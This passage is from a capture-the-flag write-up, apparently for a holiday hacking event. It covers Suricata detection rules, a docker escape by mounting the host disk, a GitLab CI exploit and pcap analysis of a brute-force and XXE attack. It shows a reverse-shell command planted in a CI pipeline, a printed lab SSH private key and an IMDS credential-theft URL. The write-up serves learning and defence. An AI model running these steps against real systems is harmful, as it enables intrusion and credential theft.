The source address that the challenge is asking for in this case is the infected host of &lt;code&gt;192.185.57.242&lt;/code&gt;, and since the challenge is asking for the internal systems, I used &lt;code&gt;$HOME_NET&lt;/code&gt; as the destination address. &lt;br&gt;
Ports can still be &lt;code&gt;any&lt;/code&gt; as they aren&amp;rsquo;t specified in this case. Since the challenge is asking for whenever the infected host communicates with the internal systems, the bidirectional (&lt;code&gt;&amp;lt;&amp;gt;&lt;/code&gt;) value can be used. &lt;br&gt;
As well, the message for the alert is specified in the challenge, and a new unique &lt;code&gt;sid&lt;/code&gt; can be assigned to this rule. &lt;br&gt;
The alert for this challenge is then: &lt;br&gt;
&lt;code&gt;alert http 192.186.57.242 any &amp;lt;&amp;gt; $HOME_NET any (msg:&amp;quot;Investigate suspicious connections, possible Dridex infection&amp;quot;; sid: 2;)&lt;/code&gt; &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209185236.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;This challenge is close to the first challenge. The action is &lt;code&gt;alert&lt;/code&gt; again for this rule. &lt;br&gt;
In this case however, &lt;code&gt;TLS&lt;/code&gt; is going to be used for the protocol in the second field. Source address and port, and destination address and port, can be &lt;code&gt;any&lt;/code&gt; for this rule since it&amp;rsquo;s not specified in the challenge as well. &lt;br&gt;
The expected message is listed in the challenge. &lt;br&gt;
For this challenge, the &lt;code&gt;tls.cert_subject&lt;/code&gt; field can be used so that the &lt;code&gt;subject&lt;/code&gt; can be filtered for. As well, &lt;code&gt;nocase&lt;/code&gt; will be used here so it&amp;rsquo;s not case sensitive, and a unique &lt;code&gt;sid&lt;/code&gt; can be assigned to it. &lt;br&gt;
The rule for this one is then: &lt;br&gt;
&lt;code&gt;alert tls any any -&amp;gt; any any (msg:&amp;quot;Investigate bad certificates, possible Dridex infection&amp;quot;; tls.cert_subject; content:&amp;quot;heardbellith.Icanwepeh.nagoya&amp;quot;; nocase; sid: 3;)&lt;/code&gt; &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209185744.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;The final question is looking for detection around base64 decoding, and specifies that it wants to just alert as the action as well. &lt;br&gt;
In this case, the &lt;code&gt;HTTP&lt;/code&gt; protocol can be used in the &lt;code&gt;alert&lt;/code&gt;. Suricata has a great &lt;a href=&#34;https://suricata.readthedocs.io/en/suricata-6.0.0/rules/http-keywords.html&#34;&gt;documentation page&lt;/a&gt; around HTTP keywords and alerts as well. For this challenge, &lt;code&gt;any&lt;/code&gt; can be used for the ports and addresses again, and the direction can be singular for the traffic as well. &lt;br&gt;
The &lt;code&gt;http.response_body&lt;/code&gt; keyword can be used so that the response body can be filtered for which is where the requested content will be. That can be filtered on with the &lt;code&gt;content&lt;/code&gt; keyword. Then a unique &lt;code&gt;sid&lt;/code&gt; can be assigned to the rule and it&amp;rsquo;s finished. &lt;br&gt;
&lt;code&gt;alert http any any -&amp;gt; any any (msg:&amp;quot;Suspicious JavaScript function, possible Dridex infection&amp;quot;; http.response_body; content:&amp;quot;let byteCharacters = atob&amp;quot;; sid: 4;)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;And that&amp;rsquo;s the final suricata challenge, and the final challenge for the Tolkien ring.&lt;/p&gt;
&lt;h1 id=&#34;recover-the-elfen-ring&#34;&gt;Recover the Elfen Ring&lt;/h1&gt;
&lt;h3 id=&#34;clone-with-a-difference&#34;&gt;Clone with a Difference&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Clone a code repository. 
Get hints for this challenge from Bow Ninecandle in the Elfen Ring.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For this challenge, it looks like git through SSH doesn&amp;rsquo;t work here. Instead, if you change the git clone command to a standard &lt;code&gt;git clone https://haugfactory.com/asnowball/aws_scripts.git&lt;/code&gt;, the repo will be cloned.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209191423.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;From here, if you tail the &lt;code&gt;README.md&lt;/code&gt; file and submit the last word, the challenge will return that the answer is correct.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209191507.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;h3 id=&#34;prison-escape&#34;&gt;Prison Escape&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Escape from a container. 
Get hints for this challenge from Bow Ninecandle in the Elfen Ring. 
What hex string appears in the host file /home/jailer/.ssh/jail.key.priv?
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;From just listing the directories on the root directory with &lt;code&gt;ls -la /&lt;/code&gt;, it looks like we are in a docker container.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209191938.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;After finding that it&amp;rsquo;s a docker container, I started looking more into docker container escapes. First, I tried finding a &lt;a href=&#34;https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#mounted-docker-socket-escape&#34;&gt;mounted docker socket&lt;/a&gt; as I was familiar with that particular escape, but I wasn&amp;rsquo;t able to find a &lt;code&gt;docker.sock&lt;/code&gt; socket on the container. From there, I looked into the &lt;a href=&#34;https://www.youtube.com/watch?v=T0jebq1M_GY&amp;amp;t=3060s&#34;&gt;effective capabilities&lt;/a&gt; for the container. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209193126.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209193149.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;However, I wasn&amp;rsquo;t able to make use of those capabilities to escape the container. &lt;br&gt;
After that, I continued looking into docker escapes and came across a &lt;a href=&#34;https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host&#34;&gt;CyberArk blog&lt;/a&gt; related to docker escapes. Specifically the very first portion titled &amp;ldquo;Know Thy Enemy&amp;rdquo;, but instead of using &lt;code&gt;findfs&lt;/code&gt; to find a drive from root, it looks like &lt;code&gt;/dev/vda&lt;/code&gt; is listed as the root. &lt;br&gt;
&lt;code&gt;sudo mount /dev/vda /mnt/mnt1/&lt;/code&gt; can then be used to mount the root file system to &lt;code&gt;/mnt/mnt1&lt;/code&gt; which can then be explored, and the contents of &lt;code&gt;/home/jailer/.ssh/jail.key.priv&lt;/code&gt; can be printed out. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230119184528.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221209194147.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;h3 id=&#34;jolly-cicd&#34;&gt;Jolly CI/CD&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Exploit a CI/CD pipeline. 
Get hints for this challenge from Tinsel Upatree in the Elfen Ring.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;One of the messages from Tinsel Upatree is below.  &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210131355.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Getting onto the internal network, I tried reaching gitlab.flag.net.internal to start the challenge, but the site wasn&amp;rsquo;t reachable. Instead of starting with the URL, I wasn&amp;rsquo;t able to identify the site or related sites. &lt;br&gt;
Since the internal subnet is listed under the &lt;code&gt;ifconfig&lt;/code&gt; for the machine we&amp;rsquo;re given, I started an nmap to see if hosts could be identified that way. The nmap command that I used was &lt;code&gt;sudo nmap -sS -p 80 -vvv 172.18.0.0/16 -oN results.txt&lt;/code&gt; to run a SYN scan on port 80 for the subnet and output the results to &lt;code&gt;results.txt&lt;/code&gt;. &lt;br&gt;
This found a few hosts, including the Wordpress one displayed below. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210133919.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;A larger collection of found hosts are below, and from the DNS resolutions, it looks like the hosts are using local_docker_network as a domain instead of net.internal. That can be seen from the &lt;code&gt;nslookup gitlab.local_docker_network&lt;/code&gt; command at the bottom. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210142138.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Now we can attempt to clone the repo mentioned by Tinsel Upatree with the command of &lt;code&gt;git clone http://gitlab.local_docker_network/rings-of-powder/wordpress.flag.net.internal.git&lt;/code&gt;. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210142327.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;A hint that I&amp;rsquo;d previously gotten in the event recommended &lt;code&gt;git log&lt;/code&gt; to show code skeletons, and running it with this repo shows a commit from knee-oh with the message of whoops. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211122329.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210142413.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;With it looking like we&amp;rsquo;re on the right track, I then ran &lt;code&gt;git log --stat&lt;/code&gt; with this commit to see what actually changed in the repo. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210144724.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;From the screenshot above, it looks like the deploy keys for knee-oh were accidently published in this repository. &lt;br&gt;
&lt;a href=&#34;https://stackoverflow.com/questions/4114095/how-do-i-revert-a-git-repository-to-a-previous-commit&#34;&gt;Git checkout&lt;/a&gt; can be used to checkout the commit containing the deployment keys. &lt;br&gt;
After gaining those keys, I tested the private key by running a new &lt;code&gt;git clone&lt;/code&gt; command on the same repo as before, and it looks like they are still working. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210153440.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;I also tested the private key with SSH which showed the user as knee-oh. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210153519.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;So at this point in the challenge, you have compromised the deployment keys of the knee-oh user, and from the files cloned from the public repo, it can be seen that Gitlab runners are being used to deploy the Wordpress site. &lt;br&gt;
The current Gitlab runner in the repo can be seen below. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210153549.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Since we have the deployment keys for a privileged user on the repo, we can change and commit a new Gitlab runner script to get a reverse shell on the Gitlab server. &lt;br&gt;
For this, I changed the current script to &lt;code&gt;sleep 2 &amp;amp;&amp;amp; nc 172.18.0.99 9001 -e /bin/bash&lt;/code&gt; where 172.18.0.99 is the address of the console that I have access to, and 9001 is the port that I want to catch a reverse shell on. The &lt;code&gt;sleep&lt;/code&gt; command is to ensure that I have time to set up the listener in case the runner is quick in executing. &lt;br&gt;
Then I used &lt;code&gt;git add .&lt;/code&gt;, &lt;code&gt;git commit&lt;/code&gt;, and &lt;code&gt;git push&lt;/code&gt; to push the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; changes. After that, I quickly set up a reverse shell listener with &lt;code&gt;nc -lvnp 9001&lt;/code&gt; and got the reverse shell from the Gitlab server. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210153644.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;If you remember the content from the original Gitlab runner that was being used with this repo, it was using a private key on the Gitlab server to SSH to the Wordpress server to deploy the changes. Instead, we can output the private key from &lt;code&gt;/etc/gitlab-runner/hhc22-wordpress-deploy&lt;/code&gt; and SSH from the console provided to the Wordpress machine. &lt;br&gt;
The SSH key can be seen below.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;-----BEGIN OPENSSH PRIVATE KEY-----
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;QyNTUxOQAAACD8EYdZTOpf5REuWXMb9FKCFWoiIX2HoU1aH90V0Ptq3wAAAJiMXr0BjF69
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;AQAAAAtzc2gtZWQyNTUxOQAAACD8EYdZTOpf5REuWXMb9FKCFWoiIX2HoU1aH90V0Ptq3w
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;AAAEBtNE6sqOFoqkmOhcB/9DgzaQhQRC/bwkAbsBXwqrt/mPwRh1lM6l/lES5Zcxv0UoIV
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;aiIhfYehTVof3RXQ+2rfAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ&lt;span style=&#34;color:#f92672&#34;&gt;==&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;-----END OPENSSH PRIVATE KEY-----
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After copying the key that was output, I saved it to &lt;code&gt;wp-key&lt;/code&gt; on the provided console, and SSH&amp;rsquo;d to the root user on the Wordpress machine which succeeded as can be seen in the screenshot below. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210154347.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;cat /flag.txt&lt;/code&gt;, the flag for this challenge can be output which concludes the Jolly CI/CD challenge, and the Elfen Ring. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221210154425.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;h1 id=&#34;recover-the-web-ring&#34;&gt;Recover the Web Ring&lt;/h1&gt;
&lt;h3 id=&#34;naughty-ip&#34;&gt;Naughty IP&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. 
Most of the traffic to this site is nice, but one IP address is being naughty! 
Which is it? Visit Sparkle Redberry in the Web Ring for hints.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The challenges for this section are all handed out at once. The second challenge references that the first attack is a brute force login so we can use that as a hint. I looked into the &lt;code&gt;weberror.log&lt;/code&gt; file and grep&amp;rsquo;d it for POST requests. &lt;br&gt;
Looking through some of the submitted POST requests, it looks like 18.222.86.32 is sending a large number of requests to the &lt;code&gt;login.html&lt;/code&gt; page. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211122808.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;The answer is then &lt;code&gt;18.222.86.32&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&#34;credential-mining&#34;&gt;Credential Mining&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;The first attack is a brute force login. What&amp;#39;s the first username tried?
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;From the previous challenge, I know that the attacking IP is 18.222.86.32, and I know that they&amp;rsquo;re sending a large number of POST requests. &lt;br&gt;
I then opened the provided pcap in Wireshark, used the search filter of &lt;code&gt;ip.addr == 18.222.86.32 &amp;amp;&amp;amp; http.request.method == POST&lt;/code&gt; to look for all of the POST requests that they sent. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211123055.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;After filtering, I use the Follow HTTP Stream feature in Wireshark on the first POST request from the IP to view the first login attempt. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211123124.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

 &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211123147.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;From the POST request, you can see that the attacker attempted to first login with the credentials of alice:philip. Therefore, the answer is &lt;code&gt;alice&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&#34;404-ftw&#34;&gt;404 FTW&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;The next attack is forced browsing where the naughty one is guessing URLs. 
What&amp;#39;s the first successful URL path in this attack?
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Using the challenge name as a hint, and knowing the bad IP, I used the &lt;code&gt;ip.addr == 18.222.86.32 &amp;amp;&amp;amp; http.response.code == 404&lt;/code&gt; Wireshark filter to take a look at what failed requests there are. &lt;br&gt;
It looks like there are a large number of 404 responses which start around the 23355 packet number. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211123400.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Knowing that the failed requests start at 23355, and that the challenge is asking for the first successful request, I changed the filter to &lt;code&gt;ip.addr == 18.222.86.32 &amp;amp;&amp;amp; http.response.code == 200&lt;/code&gt; which will get all of the successful requests for 18.222.86.32. I then just looked for the first successful request after packet number 23355. &lt;br&gt;
The first successful request in the attack looks to be packet number 26774 so I followed that HTTP stream in Wireshark. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211123719.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;Looking into that request, the answer is &lt;code&gt;/proc&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id=&#34;imds-xxe-and-other-abbreviations&#34;&gt;IMDS, XXE, and Other Abbreviations&lt;/h3&gt;
&lt;p&gt;Challenge description:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;The last step in this attack was to use XXE to get secret keys from the IMDS service. 
What URL did the attacker force the server to fetch?
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;From the last challenge on forced browsing, &lt;code&gt;/proc&lt;/code&gt; looks to be a possible endpoint for XXE. To look more into it, I used the filter of &lt;code&gt;ip.addr == 18.222.86.32 &amp;amp;&amp;amp; http.request.uri contains &amp;quot;/proc&amp;quot;&lt;/code&gt; to track down the requests made to &lt;code&gt;/proc&lt;/code&gt;. &lt;br&gt;
Looking into the last request made by 18.222.86.32 to &lt;code&gt;/proc&lt;/code&gt; and following the HTTP stream, it looks like they used XXE to retrieve AWS credentials from &lt;code&gt;http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance&lt;/code&gt;. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020221211124204.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;That URL is the solution to this challenge.&lt;/p&gt;
</content>
    </item>
    
  </channel>
</rss>
